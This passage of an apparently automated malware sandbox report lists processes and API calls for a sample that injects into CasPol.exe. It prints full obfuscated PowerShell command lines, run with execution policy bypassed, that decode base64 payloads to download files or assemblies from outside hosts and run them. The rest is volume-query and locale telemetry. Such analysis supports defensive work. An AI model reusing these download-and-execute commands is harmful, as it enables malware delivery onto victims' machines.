w5hbuvzcgfjrsagicagicagicagicagicagicagicagicagicagicagicbkrwfpicagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicagjedfojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljmumtiylje1os80ny9lbnrpcmv0aw1lbmvlzgdvb2r0agluz3nmb3jnzxriywnrymvzdhroaw5nc3dpdghnb29kbmv3c2zvci50suyilcikrw5wokfquerbvefczw50axjldgltzw5lzwrnb29kdghpbmdzzm9yz2v0ymfja2jlc3r0agluz3n3axroz29vzg5ldy52ylmildasmck7c3rbunqtu0xlzvaomyk7su52t2tlluvychjlc3njt04gicagicagicagicagicagicagicagicagicagicagicagiirlbly6qvbqrefuqvxlbnrpcmv0aw1lbmvlzgdvb2r0agluz3nmb3jnzxriywnrymvzdhroaw5nc3dpdghnb29kbmv3lnziuyi='+[char]0x22+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jedficagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagyurklvrzueugicagicagicagicagicagicagicagicagicagicagicaglw1lbwjfcmrfzmluavrjb04gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvytg1vbi5kbewilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagieletwtqbkcsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagiersacxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagdhgsdwludcagicagicagicagicagicagicagicagicagicagicagicbtvcxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicaguufrktsnicagicagicagicagicagicagicagicagicagicagicagic1uqu1licagicagicagicagicagicagicagicagicagicagicagicj6dyigicagicagicagicagicagicagicagicagicagicagicaglw5hbuvzcgfjrsagicagicagicagicagicagicagicagicagicagicagicbkrwfpicagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicagjedfojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljmumtiylje1os80ny9lbnrpcmv0aw1lbmvlzgdvb2r0agluz3nmb3jnzxriywnrymvzdhroaw5nc3dpdghnb29kbmv3c2zvci50suyilcikrw5wokfquerbvefczw50axjldgltzw5lzwrnb29kdghpbmdzzm9yz2v0ymfja2jlc3r0agluz3n3axroz29vzg5ldy52ylmildasmck7c3rbunqtu0xlzvaomyk7su52t2tlluvychjlc3njt04gicagicagicagicagicagicagicagicagicagicagicagiirlbly6qvbqrefuqvxlbnrpcmv0aw1lbmvlzgdvb2r0agluz3nmb3jnzxriywnrymvzdhroaw5nc3dpdghnb29kbmv3lnziuyi='+[char]0x22+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $corythosaurus = 'jgrlc3rvb3igpsanahr0chm6ly9yzxmuy2xvdwrpbmfyes5jb20vzhp2ywk4nnvol2ltywdll3vwbg9hzc92mtcznda1mdk5ms91bnhhb29pewt4zm13oxbhbjr6ms5qcgcgjzskbwfudwzhy3rvcnkgpsbozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50oyrpbglvdgliawfsid0gjg1hbnvmywn0b3j5lkrvd25sb2fkrgf0ysgkzgvzdg9vcik7jejlbgxvyya9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkcrpbglvdgliawfsktskbwlzcgvyy2vpdmvzid0gjzw8qkftrty0x1nuqvjupj4noyrvcmjpzm9szca9icc8pejbu0u2nf9ftkq+pic7jgh5c3rlcm9pzca9icrczwxsb2musw5kzxhpzigkbwlzcgvyy2vpdmvzktskywrkaxrpb25hbgl0esa9icrczwxsb2musw5kzxhpzigkb3jiawzvbgqpoyroexn0zxjvawqglwdlidaglwfuzcakywrkaxrpb25hbgl0esatz3qgjgh5c3rlcm9pzdskahlzdgvyb2lkics9icrtaxnwzxjjzwl2zxmutgvuz3rooyr3ywdnaw5zid0gjgfkzgl0aw9uywxpdhkglsakahlzdgvyb2lkoyryzwnyzw1lbnrzid0gjejlbgxvyy5tdwjzdhjpbmcojgh5c3rlcm9pzcwgjhdhz2dpbnmpoyrhzw5ldmegpsatam9pbiaojhjly3jlbwvudhmuvg9dagfyqxjyyxkoksb8iezvckvhy2gtt2jqzwn0ihsgjf8gfslblteuli0ojhjly3jlbwvudhmutgvuz3rokv07jgppbgxhcm9vcya9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcojedlbmv2ysk7jhbvbxvtid0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzcgkamlsbgfyb29zktskbg93zg93bia9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoj1zbsscpoyrsb3dkb3dulkludm9rzsgkbnvsbcwgqcgnmc84vjlycs9yl2vllmv0c2fwly86c3b0dggnlcanjglzb21lcmljywxsescsicckaxnvbwvyawnhbgx5jywgjyrpc29tzxjpy2fsbhknlcanq2fzug9sjywgjyrpc29tzxjpy2fsbhknlcanjglzb21lcmljywxsescsjyrpc29tzxjpy2fsbhknlcckaxnvbwvyawnhbgx5jywnjglzb21lcmljywxsescsjyrpc29tzxjpy2fsbhknlcckaxnvbwvyawnhbgx5jywnmscsjyrpc29tzxjpy2fsbhknlccnksk7';$pycnaster = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($corythosaurus));invoke-expression $pycnasterJump to behavior
                      Source: CasPol.exe, 0000000A.00000002.4498075941.0000000000DD2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerb
                      Source: CasPol.exe, 0000000A.00000002.4498075941.0000000000DD2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager+
                      Source: CasPol.exe, 0000000A.00000002.4498075941.0000000000DD2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerl
                      Source: CasPol.exe, 0000000A.00000002.4498075941.0000000000DD2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager5
                      Source: CasPol.exe, 0000000A.00000002.4498075941.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000002.4498075941.0000000000DB4000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000002.4498075941.0000000000DD2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_00433E1A cpuid 10_2_00433E1A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoA,10_2_0040E679
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,10_2_004510CA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,10_2_004470BE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,10_2_004511F3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,10_2_004512FA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,10_2_004513C7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,10_2_004475A7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,10_2_00450A8F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,10_2_00450D52
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,10_2_00450D07
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,10_2_00450DED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,10_2_00450E7A
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
